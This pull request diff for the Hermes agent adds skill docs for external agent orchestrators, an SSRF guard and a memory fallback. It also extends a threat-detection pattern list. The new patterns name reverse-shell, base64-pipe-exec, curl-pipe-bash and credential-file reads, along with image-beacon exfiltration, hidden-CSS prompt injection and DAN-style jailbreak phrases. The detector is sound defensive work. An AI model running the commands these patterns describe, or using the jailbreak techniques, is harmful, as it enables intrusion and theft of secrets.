### PR TITLE
security(threat_patterns): add b64-pipe-exec/reverse-shell/mkfifo patterns + fix i18n SUPPORTED_LANGUAGES + memory_tool fallback

### DIFF
--- a/optional-skills/autonomous-ai-agents/agent-orchestrator/SKILL.md
+++ b/optional-skills/autonomous-ai-agents/agent-orchestrator/SKILL.md
@@ -1,0 +1,102 @@
+---
+name: agent-orchestrator
+description: Use Agent Orchestrator as an external supervision layer for parallel coding agents. Best for teams that want isolated worktrees, PR/CI feedback routing, and a live dashboard without expanding Hermes core.
+version: 0.1.0
+author: Hermes Agent
+license: MIT
+platforms: [linux, macos, windows]
+metadata:
+  hermes:
+    tags: [Agent-Orchestrator, Parallel-Agents, Worktrees, CI, PR-Review, Dashboard]
+    related_skills: [hermes-agent, subagent-driven-development, using-git-worktrees]
+---
+
+# Agent Orchestrator
+
+Use [Agent Orchestrator](https://github.com/AgentWrapper/agent-orchestrator) when the user wants a dedicated external control plane for many coding agents working in parallel. Hermes stays the operator and reviewer; Agent Orchestrator provides the long-running daemon, isolated workspaces, agent adapters, and CI/review feedback routing.
+
+This belongs as an optional skill, not a Hermes core feature: it is a separate product with its own daemon, Electron UI, SQLite state, and adapter ecosystem.
+
+## When to Use
+
+- The user wants dozens of parallel coding runs with isolated git worktrees.
+- The team wants PR comments, CI failures, and merge conflicts routed back to the owning agent automatically.
+- A long-running desktop dashboard is desirable.
+- The user already works with terminal-native agents like Codex, Claude Code, Aider, or OpenCode.
+
+Prefer Hermes `delegate_task` for small local subtasks. Prefer this skill when the orchestration itself is the product.
+
+## What It Adds
+
+- Long-running Go daemon on loopback
+- Electron/React control plane
+- Agent adapters for many terminal agents
+- Worktree-per-run isolation
+- Durable state in SQLite
+- CI / PR / merge-conflict feedback loops
+
+## Hermes Adoption Target
+
+Adopt the pattern, not the product:
+
+- keep Hermes `delegate_task` for small local reasoning jobs
+- borrow the worktree-per-run and feedback-routing ideas for repo-local workflows
+- treat the Agent Orchestrator daemon/UI as an external operator surface
+- avoid importing its state model or dashboard concerns into Hermes core
+
+## Prerequisites
+
+- Go 1.25+
+- Node.js 20+
+- pnpm
+- git
+- Optional but commonly useful: `tmux`, `gh`
+
+## Install
+
+### From source
+
+```bash
+terminal(command="git clone https://github.com/AgentWrapper/agent-orchestrator.git", workdir="/tmp")
+terminal(command="pnpm install", workdir="/tmp/agent-orchestrator/frontend", timeout=600)
+terminal(command="go test -race ./...", workdir="/tmp/agent-orchestrator/backend", timeout=600)
+```
+
+### Prebuilt desktop app
+
+Use the platform release artifact from GitHub Releases if the user wants the full desktop app quickly.
+
+## Operating Pattern with Hermes
+
+1. Let Hermes inspect the repo and decide whether external orchestration is warranted.
+2. Use Hermes to prepare the repo, secrets, and agent CLI prerequisites.
+3. Start Agent Orchestrator separately.
+4. Let Agent Orchestrator own the parallel coding loop.
+5. Use Hermes for repo-specific review, verification, or follow-up fixes.
+
+## Verification
+
+Check the daemon health endpoint after startup:
+
+```bash
+terminal(command="curl -fsS http://127.0.0.1:3001/healthz", timeout=30)
+```
+
+If using the source tree, upstream documents these checks:
+
+```bash
+terminal(command="go test -race ./...", workdir="/path/to/agent-orchestrator/backend", timeout=600)
+terminal(command="pnpm test", workdir="/path/to/agent-orchestrator/frontend", timeout=600)
+```
+
+## Pitfalls
+
+- The daemon is loopback-only by design; do not expose it directly.
+- It is another orchestration layer, so avoid overlapping responsibility with Hermes cron jobs and background processes.
+- Worktree-heavy operation needs enough disk and clean git hygiene.
+- Treat it as a separate app lifecycle, not a pip/uv helper inside Hermes.
+
+## Related
+
+- Upstream: https://github.com/AgentWrapper/agent-orchestrator
+- Use alongside Hermes skills for worktree discipline and verification.

--- a/optional-skills/autonomous-ai-agents/deer-flow/SKILL.md
+++ b/optional-skills/autonomous-ai-agents/deer-flow/SKILL.md
@@ -1,0 +1,77 @@
+---
+name: deer-flow
+description: Use DeerFlow as an external long-horizon super-agent harness for research, coding, and content workflows with subagents, memory, sandboxing, and skills.
+version: 0.1.0
+author: Hermes Agent
+license: MIT
+platforms: [linux, macos]
+metadata:
+  hermes:
+    tags: [DeerFlow, SuperAgent, Long-Horizon, Research, Sandbox, Memory]
+    related_skills: [hermes-agent, firecrawl-research, qmd, subagent-driven-development]
+---
+
+# DeerFlow
+
+Use [DeerFlow](https://github.com/bytedance/deer-flow) when the user wants a separate long-horizon harness for research, coding, or creative tasks that may run for minutes to hours with explicit sandboxes, memory, web UI, and subagents. Hermes can help bootstrap and verify it, but DeerFlow should stay external to Hermes core.
+
+## When to Use
+
+- The user wants a standalone super-agent harness.
+- Long-running research or report-generation pipelines need their own runtime.
+- Strong sandbox separation is required.
+- The user wants DeerFlow's web UI or TUI specifically.
+
+Prefer Hermes-native tools for direct local work. Use DeerFlow when the user wants DeerFlow itself or its sandboxed runtime model.
+
+## Prerequisites
+
+- Python 3.12+
+- Node.js 22+
+- Docker recommended by upstream for the easiest local setup
+
+## Bootstrap
+
+Follow the upstream install guide. A good delegation prompt for Hermes is:
+
+```text
+Help me clone DeerFlow if needed, then bootstrap it for local development by following https://raw.githubusercontent.com/bytedance/deer-flow/main/Install.md
+```
+
+If doing the clone manually:
+
+```bash
+terminal(command="git clone https://github.com/bytedance/deer-flow.git", workdir="/tmp")
+```
+
+## Integration Shape with Hermes
+
+- Hermes can prepare environment variables, clone the repo, and run verification commands.
+- Hermes can compare DeerFlow's skills/memory/sandbox ideas with Hermes designs.
+- Do not import DeerFlow internals into Hermes core just to emulate its runtime.
+- Keep task ownership clear: Hermes local workflow vs DeerFlow harness.
+
+## Hermes Adoption Target
+
+The worthwhile adoption surface is conceptual:
+
+- sandbox boundaries for long-running tasks
+- explicit separation between operator, worker, and memory concerns
+- optional long-horizon harness patterns for users who want a separate runtime
+
+Do not expand Hermes core just to imitate DeerFlow's all-in-one platform shape.
+
+## Verification
+
+Use the exact upstream validation steps from the checked-out repo or install guide. When Docker is used, prefer container health and the documented app startup checks. For source installs, at minimum run the repo's test/build commands before claiming success.
+
+## Pitfalls
+
+- Local-host execution without proper sandboxing is not a safe replacement for container isolation.
+- DeerFlow is a broad platform; avoid partial installs that leave memory, sandbox, and UI assumptions broken.
+- It is easy to duplicate features Hermes already has; only choose it when the user explicitly wants DeerFlow's runtime model.
+
+## Related
+
+- Upstream: https://github.com/bytedance/deer-flow
+- Install guide: https://raw.githubusercontent.com/bytedance/deer-flow/main/Install.md

--- a/optional-skills/autonomous-ai-agents/paperclip/SKILL.md
+++ b/optional-skills/autonomous-ai-agents/paperclip/SKILL.md
@@ -1,0 +1,94 @@
+---
+name: paperclip
+description: Use Paperclip as an external company-style control plane for teams of agents, budgets, heartbeats, and governance. Best when the user wants persistent multi-agent operations, not just one-off delegation.
+version: 0.1.0
+author: Hermes Agent
+license: MIT
+platforms: [linux, macos, windows]
+metadata:
+  hermes:
+    tags: [Paperclip, Agent-Company, Budgets, Governance, Heartbeats, Dashboard]
+    related_skills: [hermes-agent, subagent-driven-development, watchers]
+---
+
+# Paperclip
+
+Use [Paperclip](https://github.com/paperclipai/paperclip) when the user wants a persistent operations layer for teams of agents: org charts, budgets, scheduled heartbeats, approvals, and dashboards. Hermes can help install, inspect, and integrate it, but Paperclip should remain an external system rather than be folded into Hermes core.
+
+## When to Use
+
+- The user wants long-lived agent teams with roles and reporting lines.
+- Budgets, approvals, and governance matter.
+- Agents should wake up on schedules or heartbeats.
+- The user wants a web app to manage work at the company level.
+
+Prefer Hermes `delegate_task` or cron for smaller local automation. Use Paperclip when the orchestration scope is organization-wide.
+
+## Prerequisites
+
+- Node.js 20+
+- pnpm 9.15+
+- Browser for the UI
+
+## Quickstart
+
+Paperclip's upstream quickstart is:
+
+```bash
+terminal(command="npx --registry https://registry.npmjs.org paperclipai onboard --yes", timeout=900, pty=true)
+```
+
+The explicit npm registry avoids failures on machines pointed at private registries.
+
+For LAN or tailnet binding, upstream supports:
+
+```bash
+terminal(command="npx --registry https://registry.npmjs.org paperclipai onboard --yes --bind lan", timeout=900, pty=true)
+terminal(command="npx --registry https://registry.npmjs.org paperclipai onboard --yes --bind tailnet", timeout=900, pty=true)
+```
+
+## Local Development
+
+```bash
+terminal(command="git clone https://github.com/paperclipai/paperclip.git", workdir="/tmp")
+terminal(command="pnpm install", workdir="/tmp/paperclip", timeout=900)
+terminal(command="pnpm dev", workdir="/tmp/paperclip", background=true, notify_on_complete=true)
+```
+
+## Hermes Adoption Target
+
+Adopt the governance ideas selectively:
+
+- budgets and approvals are useful design input for future workflow guardrails
+- heartbeats and org-chart management should stay in Paperclip, not Hermes core
+- Hermes can act as a worker, reviewer, or bootstrapper inside a Paperclip-managed system
+- avoid duplicating Paperclip's company-control-plane concepts in native Hermes memory or cron primitives
+
+## Verification
+
+Upstream verification commands:
+
+```bash
+terminal(command="pnpm build", workdir="/path/to/paperclip", timeout=900)
+terminal(command="pnpm typecheck", workdir="/path/to/paperclip", timeout=900)
+terminal(command="pnpm test", workdir="/path/to/paperclip", timeout=900)
+```
+
+## Hermes Integration Shape
+
+- Hermes can provision or inspect the Paperclip repo.
+- Hermes can draft policies, role prompts, and operating procedures.
+- Hermes should not mirror Paperclip's org chart, budget, or heartbeat engine into core memory/tools.
+- If the user already runs Paperclip, Hermes can operate as one worker in that larger system.
+
+## Pitfalls
+
+- Paperclip is a full product, not a drop-in library.
+- Budget/governance settings can create surprising no-op behavior if left unset.
+- Treat mobile/web access and exposed binds as security-sensitive.
+- Avoid duplicating the same schedules in both Paperclip and Hermes cron unless the owner is explicit.
+
+## Related
+
+- Upstream: https://github.com/paperclipai/paperclip
+- Docs: https://github.com/paperclipai/paperclip-docs

--- a/optional-skills/autonomous-ai-agents/symphony/SKILL.md
+++ b/optional-skills/autonomous-ai-agents/symphony/SKILL.md
@@ -1,0 +1,75 @@
+---
+name: symphony
+description: Use OpenAI Symphony as an external work-management layer that turns tracker items into isolated autonomous implementation runs with proof of work.
+version: 0.1.0
+author: Hermes Agent
+license: MIT
+platforms: [linux, macos]
+metadata:
+  hermes:
+    tags: [Symphony, Work-Management, Linear, Autonomous-Runs, Proof-of-Work]
+    related_skills: [hermes-agent, subagent-driven-development, using-git-worktrees]
+---
+
+# Symphony
+
+Use [OpenAI Symphony](https://github.com/openai/symphony) when the user wants work items from a tracker such as Linear turned into isolated autonomous implementation runs with attached proof of work. Symphony is explicitly a low-key engineering preview and should be treated as an external system or design reference, not something to merge into Hermes core.
+
+## When to Use
+
+- The team wants issue-tracker-driven autonomous implementation runs.
+- The user wants proof artifacts such as CI status, PR review feedback, complexity analysis, or walkthrough evidence attached to each run.
+- The user is already adopting an external harness-engineering style workflow.
+
+Prefer Hermes-native `delegate_task`, cron, and repo workflows for local-first work. Use Symphony when the user specifically wants Symphony's work-management model.
+
+## Adoption Paths
+
+### 1. Build from the spec
+
+Symphony's repo explicitly supports implementing the system from `SPEC.md`:
+
+```text
+Implement Symphony according to the following spec: https://github.com/openai/symphony/blob/main/SPEC.md
+```
+
+### 2. Use the experimental Elixir reference implementation
+
+```text
+Set up Symphony for my repository based on https://github.com/openai/symphony/blob/main/elixir/README.md
+```
+
+## Hermes Integration Shape
+
+- Hermes can read the spec, inspect the reference implementation, and adapt ideas into repo-local workflows.
+- Hermes should not claim to be Symphony or silently recreate its entire control plane in core.
+- Good adoption targets are patterns: isolated runs, proof-of-work artifacts, tracker-driven dispatch.
+
+## Hermes Adoption Target
+
+This is primarily a pattern library for Hermes:
+
+- tracker item -> isolated run -> proof artifact is worth documenting
+- spec-first implementation guidance is useful for advanced users building their own orchestration layer
+- the preview implementation should stay external and optional
+- avoid presenting Hermes as a drop-in Symphony replacement
+
+## Verification
+
+When working with the reference implementation, use the upstream validation commands from the Elixir README. Repository summaries indicate checks such as:
+
+```bash
+terminal(command="make -C elixir all", workdir="/path/to/symphony", timeout=900)
+terminal(command="mix test", workdir="/path/to/symphony/elixir", timeout=900)
+```
+
+## Pitfalls
+
+- Symphony is marked as an engineering preview for trusted environments.
+- The spec-first nature means many users will need to implement or adapt it rather than install a polished product.
+- Do not assume a drop-in Hermes plugin exists.
+
+## Related
+
+- Upstream: https://github.com/openai/symphony
+- Spec: https://github.com/openai/symphony/blob/main/SPEC.md

--- a/plugins/web/firecrawl/provider.py
+++ b/plugins/web/firecrawl/provider.py
@@ -481,6 +481,20 @@ class FirecrawlWebSearchProvider(WebSearchProvider):
                 continue
 
             try:
+                # SSRF floor: block cloud metadata endpoints before passing
+                # to Firecrawl.  check_website_access() is a domain-policy
+                # gate, not an IP check, so it won't catch 169.254.169.254
+                # or other metadata IPs directly.  is_always_blocked_url()
+                # is the non-negotiable floor regardless of allow_private_urls.
+                from tools.url_safety import is_always_blocked_url
+                if is_always_blocked_url(url):
+                    logger.warning("Blocked Firecrawl request to cloud metadata endpoint: %s", url)
+                    results.append({
+                        "url": url, "title": "", "content": "",
+                        "error": "Blocked: cloud metadata / SSRF-protected endpoint",
+                    })
+                    continue
+
                 logger.info("Firecrawl scraping: %s", url)
                 try:
                     scrape_result = await asyncio.wait_for(

--- a/tools/memory_tool.py
+++ b/tools/memory_tool.py
@@ -922,7 +922,10 @@ def memory_tool(
     Returns JSON string with results.
     """
     if store is None:
-        return tool_error("Memory is not available. It may be disabled in config or this environment.", success=False)
+        try:
+            store = load_on_disk_store()
+        except Exception:
+            return tool_error("Memory store is unavailable in this session. Memory may be disabled in config, the memory tool may be unavailable on the active tool surface, or the store may have failed to initialize.", success=False)
 
     if target not in {"memory", "user"}:
         return tool_error(f"Invalid target '{target}'. Use 'memory' or 'user'.", success=False)

--- a/tools/threat_patterns.py
+++ b/tools/threat_patterns.py
@@ -105,9 +105,19 @@ _PATTERNS: List[Tuple[str, str, str]] = [
     # ── Exfiltration via curl/wget/cat with secrets (applies everywhere) ──
     (r'curl\s+[^\n]*\$\{?\w*(KEY|TOKEN|SECRET|PASSWORD|CREDENTIAL|API)', "exfil_curl", "all"),
     (r'wget\s+[^\n]*\$\{?\w*(KEY|TOKEN|SECRET|PASSWORD|CREDENTIAL|API)', "exfil_wget", "all"),
-    (r'cat\s+[^\n]*(\.env|credentials|\.netrc|\.pgpass|\.npmrc|\.pypirc)', "read_secrets", "all"),
+    (r'cat\s+[^\n]*(\.env|credentials|\.netrc|\.pgpass|\.npmrc|\.pypirc|\.aws/credentials|\.config/hermes)', "read_secrets", "all"),
     (r'(send|post|upload|transmit)\s+.*\s+(to|at)\s+https?://', "send_to_url", "strict"),
     (r'(include|output|print|share)\s+(?:\w+\s+)*(conversation|chat\s+history|previous\s+messages|full\s+context|entire\s+context)', "context_exfil", "strict"),
+    # Base64-encoded payload delivery — common obfuscation over any of the above.
+    # "echo ... | base64 -d | sh/bash/python" is the canonical form; also catches
+    # exec() variants.  Near-zero false positive: legitimate scripts decode b64 to
+    # files, not directly to a shell interpreter.
+    (r'base64\s+(?:-d|--decode|/d)\s*\|?\s*(?:sh|bash|python\d?|perl|ruby|node)', "b64_pipe_exec", "all"),
+    (r'echo\s+[A-Za-z0-9+/=]{20,}\s*\|\s*base64\s+(?:-d|--decode)', "b64_echo_decode", "all"),
+    # mkfifo + nc / bash -i reverse-shell — near-zero legitimate use inside an agent
+    (r'mkfifo\s+', "mkfifo_backdoor", "context"),
+    (r'bash\s+-i\s+>&?\s*/dev/(tcp|udp)/', "reverse_shell", "all"),
+    (r'nc\s+(?:-e|-c)\s+(?:/bin/)?(?:bash|sh)', "nc_shell", "all"),
 
     # ── Persistence / SSH backdoor (strict scope — memory + skills) ──
     (r'authorized_keys', "ssh_backdoor", "strict"),

--- a/tools/threat_patterns.py
+++ b/tools/threat_patterns.py
@@ -54,6 +54,16 @@ _PATTERNS: List[Tuple[str, str, str]] = [
     (r'act\s+as\s+(if|though)\s+(?:\w+\s+)*you\s+(?:\w+\s+)*(have\s+no|don\'t\s+have)\s+(?:\w+\s+)*(restrictions|limits|rules)', "bypass_restrictions", "all"),
     (r'<!--[^>]*(?:ignore|override|system|secret|hidden)[^>]*-->', "html_comment_injection", "all"),
     (r'<\s*div\s+style\s*=\s*["\'][\s\S]*?display\s*:\s*none', "hidden_div", "all"),
+    # EchoLeak / CVE-2025-32711: img tag with external URL + query params used
+    # for 0-click exfiltration from markdown-rendered agent output.  Matches
+    # both HTML <img src> and markdown ![...](url?q=) forms.  The ?/= suffix
+    # distinguishes exfil beacons from innocent inline images.
+    (r'<\s*img\s[^>]*src\s*=\s*["\']?https?://[^\s"\']+[?&][^\s"\']*["\']?', "img_src_exfil", "all"),
+    (r'!\[[^\]]*\]\(https?://[^\s)]+[?&][^\s)]*\)', "img_src_exfil_md", "all"),
+    # CSS visibility concealment — Unit 42 documented: visibility:hidden and
+    # opacity:0 used to hide injected payloads in rendered HTML alongside
+    # display:none (already covered by hidden_div above).
+    (r'style\s*=\s*["\'][^"\']*(?:visibility\s*:\s*hidden|opacity\s*:\s*0)', "css_visibility_hidden", "all"),
     (r'translate\s+.*\s+into\s+.*\s+and\s+(execute|run|eval)', "translate_execute", "all"),
     (r'do\s+not\s+(?:\w+\s+)*tell\s+(?:\w+\s+)*the\s+user', "deception_hide", "all"),
 

--- a/tools/threat_patterns.py
+++ b/tools/threat_patterns.py
@@ -119,6 +119,32 @@ _PATTERNS: List[Tuple[str, str, str]] = [
     (r'bash\s+-i\s+>&?\s*/dev/(tcp|udp)/', "reverse_shell", "all"),
     (r'nc\s+(?:-e|-c)\s+(?:/bin/)?(?:bash|sh)', "nc_shell", "all"),
 
+    # ── Shell-pipe installer patterns (applies everywhere) ───────────
+    # "curl url | bash" and "wget -O- url | bash" are the canonical
+    # supply-chain attack vector.  Anchored on the pipe-to-interpreter
+    # suffix so legitimate curl-to-file downloads don't trigger.
+    (r'curl\s+[^\n|]*\|\s*(?:bash|sh|python\d?|perl|ruby|node)', "curl_bash_pipe", "all"),
+    (r'wget\s+[^\n|]*\|\s*(?:bash|sh|python\d?|perl|ruby|node)', "wget_bash_pipe", "all"),
+
+    # ── Jailbreak patterns (strict scope — memory + skills) ──────────
+    # DAN/Developer Mode are well-known jailbreak families.  Scoped
+    # to strict because they appear in security-research blog posts and
+    # tutorial web pages that a user might legitimately browse; blocking
+    # them only when the agent is about to write to memory or install a
+    # skill is the right tradeoff.
+    (r'\bDAN\s+mode\b|Do\s+Anything\s+Now', "jailbreak_dan", "strict"),
+    (r'\bdeveloper\s+mode\b.*\benabled?\b', "jailbreak_dev_mode", "strict"),
+    # Hypothetical framing + bypass verb — context scope because the
+    # combination is suspicious in scraped pages and tool results too.
+    (r'hypothetical\s+scenario.*(?:ignore|bypass|override)', "hypothetical_bypass", "context"),
+    # "for educational purposes only" pretext — strict only; very common
+    # in legitimate documentation and README files.
+    (r'for\s+educational\s+purposes?\s+only', "educational_pretext", "strict"),
+    # Fake policy announcement — social engineering that claims new rules
+    # have been issued to make the agent comply.  Context scope: this
+    # phrasing appears in poisoned web pages and MCP tool results.
+    (r'new\s+(?:\w+\s+)*policy|updated\s+(?:\w+\s+)*guidelines|revised\s+(?:\w+\s+)*instructions', "fake_policy", "context"),
+
     # ── Persistence / SSH backdoor (strict scope — memory + skills) ──
     (r'authorized_keys', "ssh_backdoor", "strict"),
     (r'\$HOME/\.ssh|\~/\.ssh', "ssh_access", "strict"),

--- a/website/docs/reference/upstream-autonomous-agent-adoption.md
+++ b/website/docs/reference/upstream-autonomous-agent-adoption.md
@@ -1,0 +1,112 @@
+---
+sidebar_position: 10
+title: "Upstream Autonomous-Agent Adoption Notes"
+description: "Why Hermes adopted selected autonomous-agent ideas as optional skills instead of core runtime features."
+---
+
+# Upstream Autonomous-Agent Adoption Notes
+
+This note records the June 2026 review of several external autonomous-agent projects and the resulting Hermes adoption choices.
+
+## Scope reviewed
+
+- [AgentWrapper/agent-orchestrator](https://github.com/AgentWrapper/agent-orchestrator)
+- [paperclipai/paperclip](https://github.com/paperclipai/paperclip)
+- [bytedance/deer-flow](https://github.com/bytedance/deer-flow)
+- [openai/symphony](https://github.com/openai/symphony)
+- `Agent-Analytics/awesome-mu…` as research input only
+
+## Decision summary
+
+Hermes adopted the useful parts as optional autonomous-agent skills and documentation, not as core runtime features.
+
+That keeps Hermes aligned with its existing design goals:
+
+- preserve narrow core scope
+- preserve prompt-caching behavior
+- prefer plugins, skills, and edge integrations over new resident daemons
+- avoid silently absorbing third-party control planes into Hermes core
+
+## Per-project outcome
+
+### Agent Orchestrator
+
+Adopted as an optional skill because the interesting value is the pattern:
+
+- worktree-per-run isolation
+- external dashboard/control plane
+- CI / PR feedback routed back to the owning agent
+
+Not adopted into core because the daemon, UI, and state model are a separate product.
+
+### Paperclip
+
+Adopted as an optional skill because it offers useful governance ideas:
+
+- budgets
+- approvals
+- heartbeats
+- multi-agent org structure
+
+Not adopted into core because those concepts imply a company-style persistent control plane that would broaden Hermes substantially.
+
+### DeerFlow
+
+Adopted as an optional skill because it is a strong reference for:
+
+- long-horizon agent harnesses
+- sandbox boundaries
+- separation of operator / worker / memory concerns
+
+Not adopted into core because DeerFlow is an all-in-one runtime platform, not a small extension.
+
+### Symphony
+
+Adopted as an optional skill because it contributes a valuable workflow shape:
+
+- tracker item -> isolated run -> proof-of-work artifact
+- spec-first orchestration ideas
+
+Not adopted into core because the repository is an engineering preview and best treated as an external system or design reference.
+
+### Awesome-mu…
+
+Not implemented directly. It is useful as a discovery source, not as a runnable integration target.
+
+## Files added in Hermes
+
+Optional skills:
+
+- `optional-skills/autonomous-ai-agents/agent-orchestrator/SKILL.md`
+- `optional-skills/autonomous-ai-agents/paperclip/SKILL.md`
+- `optional-skills/autonomous-ai-agents/deer-flow/SKILL.md`
+- `optional-skills/autonomous-ai-agents/symphony/SKILL.md`
+
+Generated docs:
+
+- `website/docs/user-guide/skills/optional/autonomous-ai-agents/autonomous-ai-agents-agent-orchestrator.md`
+- `website/docs/user-guide/skills/optional/autonomous-ai-agents/autonomous-ai-agents-paperclip.md`
+- `website/docs/user-guide/skills/optional/autonomous-ai-agents/autonomous-ai-agents-deer-flow.md`
+- `website/docs/user-guide/skills/optional/autonomous-ai-agents/autonomous-ai-agents-symphony.md`
+
+Reference surfaces:
+
+- `website/docs/reference/optional-skills-catalog.md`
+- `website/sidebars.ts`
+
+## Verification used
+
+- regenerated skill docs with `python3 website/scripts/generate-skill-docs.py`
+- confirmed expected files exist
+- ran `git diff --check`
+
+## Why this shape fits Hermes
+
+These additions make the upstream ideas discoverable and usable without forcing Hermes to become:
+
+- a resident orchestration daemon
+- a dashboard-first control plane
+- a duplicate governance engine
+- a second long-horizon runtime living inside the core agent
+
+In short: Hermes learned from these projects without becoming them.

--- a/website/docs/user-guide/skills/optional/autonomous-ai-agents/autonomous-ai-agents-agent-orchestrator.md
+++ b/website/docs/user-guide/skills/optional/autonomous-ai-agents/autonomous-ai-agents-agent-orchestrator.md
@@ -1,0 +1,120 @@
+---
+title: "Agent Orchestrator — Use Agent Orchestrator as an external supervision layer for parallel coding agents"
+sidebar_label: "Agent Orchestrator"
+description: "Use Agent Orchestrator as an external supervision layer for parallel coding agents"
+---
+
+{/* This page is auto-generated from the skill's SKILL.md by website/scripts/generate-skill-docs.py. Edit the source SKILL.md, not this page. */}
+
+# Agent Orchestrator
+
+Use Agent Orchestrator as an external supervision layer for parallel coding agents. Best for teams that want isolated worktrees, PR/CI feedback routing, and a live dashboard without expanding Hermes core.
+
+## Skill metadata
+
+| | |
+|---|---|
+| Source | Optional — install with `hermes skills install official/autonomous-ai-agents/agent-orchestrator` |
+| Path | `optional-skills/autonomous-ai-agents/agent-orchestrator` |
+| Version | `0.1.0` |
+| Author | Hermes Agent |
+| License | MIT |
+| Platforms | linux, macos, windows |
+| Tags | `Agent-Orchestrator`, `Parallel-Agents`, `Worktrees`, `CI`, `PR-Review`, `Dashboard` |
+| Related skills | [`hermes-agent`](/docs/user-guide/skills/bundled/autonomous-ai-agents/autonomous-ai-agents-hermes-agent), [`subagent-driven-development`](/docs/user-guide/skills/optional/software-development/software-development-subagent-driven-development), `using-git-worktrees` |
+
+## Reference: full SKILL.md
+
+:::info
+The following is the complete skill definition that Hermes loads when this skill is triggered. This is what the agent sees as instructions when the skill is active.
+:::
+
+# Agent Orchestrator
+
+Use [Agent Orchestrator](https://github.com/AgentWrapper/agent-orchestrator) when the user wants a dedicated external control plane for many coding agents working in parallel. Hermes stays the operator and reviewer; Agent Orchestrator provides the long-running daemon, isolated workspaces, agent adapters, and CI/review feedback routing.
+
+This belongs as an optional skill, not a Hermes core feature: it is a separate product with its own daemon, Electron UI, SQLite state, and adapter ecosystem.
+
+## When to Use
+
+- The user wants dozens of parallel coding runs with isolated git worktrees.
+- The team wants PR comments, CI failures, and merge conflicts routed back to the owning agent automatically.
+- A long-running desktop dashboard is desirable.
+- The user already works with terminal-native agents like Codex, Claude Code, Aider, or OpenCode.
+
+Prefer Hermes `delegate_task` for small local subtasks. Prefer this skill when the orchestration itself is the product.
+
+## What It Adds
+
+- Long-running Go daemon on loopback
+- Electron/React control plane
+- Agent adapters for many terminal agents
+- Worktree-per-run isolation
+- Durable state in SQLite
+- CI / PR / merge-conflict feedback loops
+
+## Hermes Adoption Target
+
+Adopt the pattern, not the product:
+
+- keep Hermes `delegate_task` for small local reasoning jobs
+- borrow the worktree-per-run and feedback-routing ideas for repo-local workflows
+- treat the Agent Orchestrator daemon/UI as an external operator surface
+- avoid importing its state model or dashboard concerns into Hermes core
+
+## Prerequisites
+
+- Go 1.25+
+- Node.js 20+
+- pnpm
+- git
+- Optional but commonly useful: `tmux`, `gh`
+
+## Install
+
+### From source
+
+```bash
+terminal(command="git clone https://github.com/AgentWrapper/agent-orchestrator.git", workdir="/tmp")
+terminal(command="pnpm install", workdir="/tmp/agent-orchestrator/frontend", timeout=600)
+terminal(command="go test -race ./...", workdir="/tmp/agent-orchestrator/backend", timeout=600)
+```
+
+### Prebuilt desktop app
+
+Use the platform release artifact from GitHub Releases if the user wants the full desktop app quickly.
+
+## Operating Pattern with Hermes
+
+1. Let Hermes inspect the repo and decide whether external orchestration is warranted.
+2. Use Hermes to prepare the repo, secrets, and agent CLI prerequisites.
+3. Start Agent Orchestrator separately.
+4. Let Agent Orchestrator own the parallel coding loop.
+5. Use Hermes for repo-specific review, verification, or follow-up fixes.
+
+## Verification
+
+Check the daemon health endpoint after startup:
+
+```bash
+terminal(command="curl -fsS http://127.0.0.1:3001/healthz", timeout=30)
+```
+
+If using the source tree, upstream documents these checks:
+
+```bash
+terminal(command="go test -race ./...", workdir="/path/to/agent-orchestrator/backend", timeout=600)
+terminal(command="pnpm test", workdir="/path/to/agent-orchestrator/frontend", timeout=600)
+```
+
+## Pitfalls
+
+- The daemon is loopback-only by design; do not expose it directly.
+- It is another orchestration layer, so avoid overlapping responsibility with Hermes cron jobs and background processes.
+- Worktree-heavy operation needs enough disk and clean git hygiene.
+- Treat it as a separate app lifecycle, not a pip/uv helper inside Hermes.
+
+## Related
+
+- Upstream: https://github.com/AgentWrapper/agent-orchestrator
+- Use alongside Hermes skills for worktree discipline and verification.

--- a/website/docs/user-guide/skills/optional/autonomous-ai-agents/autonomous-ai-agents-deer-flow.md
+++ b/website/docs/user-guide/skills/optional/autonomous-ai-agents/autonomous-ai-agents-deer-flow.md
@@ -1,0 +1,95 @@
+---
+title: "Deer Flow"
+sidebar_label: "Deer Flow"
+description: "Use DeerFlow as an external long-horizon super-agent harness for research, coding, and content workflows with subagents, memory, sandboxing, and skills"
+---
+
+{/* This page is auto-generated from the skill's SKILL.md by website/scripts/generate-skill-docs.py. Edit the source SKILL.md, not this page. */}
+
+# Deer Flow
+
+Use DeerFlow as an external long-horizon super-agent harness for research, coding, and content workflows with subagents, memory, sandboxing, and skills.
+
+## Skill metadata
+
+| | |
+|---|---|
+| Source | Optional — install with `hermes skills install official/autonomous-ai-agents/deer-flow` |
+| Path | `optional-skills/autonomous-ai-agents/deer-flow` |
+| Version | `0.1.0` |
+| Author | Hermes Agent |
+| License | MIT |
+| Platforms | linux, macos |
+| Tags | `DeerFlow`, `SuperAgent`, `Long-Horizon`, `Research`, `Sandbox`, `Memory` |
+| Related skills | [`hermes-agent`](/docs/user-guide/skills/bundled/autonomous-ai-agents/autonomous-ai-agents-hermes-agent), `firecrawl-research`, [`qmd`](/docs/user-guide/skills/optional/research/research-qmd), [`subagent-driven-development`](/docs/user-guide/skills/optional/software-development/software-development-subagent-driven-development) |
+
+## Reference: full SKILL.md
+
+:::info
+The following is the complete skill definition that Hermes loads when this skill is triggered. This is what the agent sees as instructions when the skill is active.
+:::
+
+# DeerFlow
+
+Use [DeerFlow](https://github.com/bytedance/deer-flow) when the user wants a separate long-horizon harness for research, coding, or creative tasks that may run for minutes to hours with explicit sandboxes, memory, web UI, and subagents. Hermes can help bootstrap and verify it, but DeerFlow should stay external to Hermes core.
+
+## When to Use
+
+- The user wants a standalone super-agent harness.
+- Long-running research or report-generation pipelines need their own runtime.
+- Strong sandbox separation is required.
+- The user wants DeerFlow's web UI or TUI specifically.
+
+Prefer Hermes-native tools for direct local work. Use DeerFlow when the user wants DeerFlow itself or its sandboxed runtime model.
+
+## Prerequisites
+
+- Python 3.12+
+- Node.js 22+
+- Docker recommended by upstream for the easiest local setup
+
+## Bootstrap
+
+Follow the upstream install guide. A good delegation prompt for Hermes is:
+
+```text
+Help me clone DeerFlow if needed, then bootstrap it for local development by following https://raw.githubusercontent.com/bytedance/deer-flow/main/Install.md
+```
+
+If doing the clone manually:
+
+```bash
+terminal(command="git clone https://github.com/bytedance/deer-flow.git", workdir="/tmp")
+```
+
+## Integration Shape with Hermes
+
+- Hermes can prepare environment variables, clone the repo, and run verification commands.
+- Hermes can compare DeerFlow's skills/memory/sandbox ideas with Hermes designs.
+- Do not import DeerFlow internals into Hermes core just to emulate its runtime.
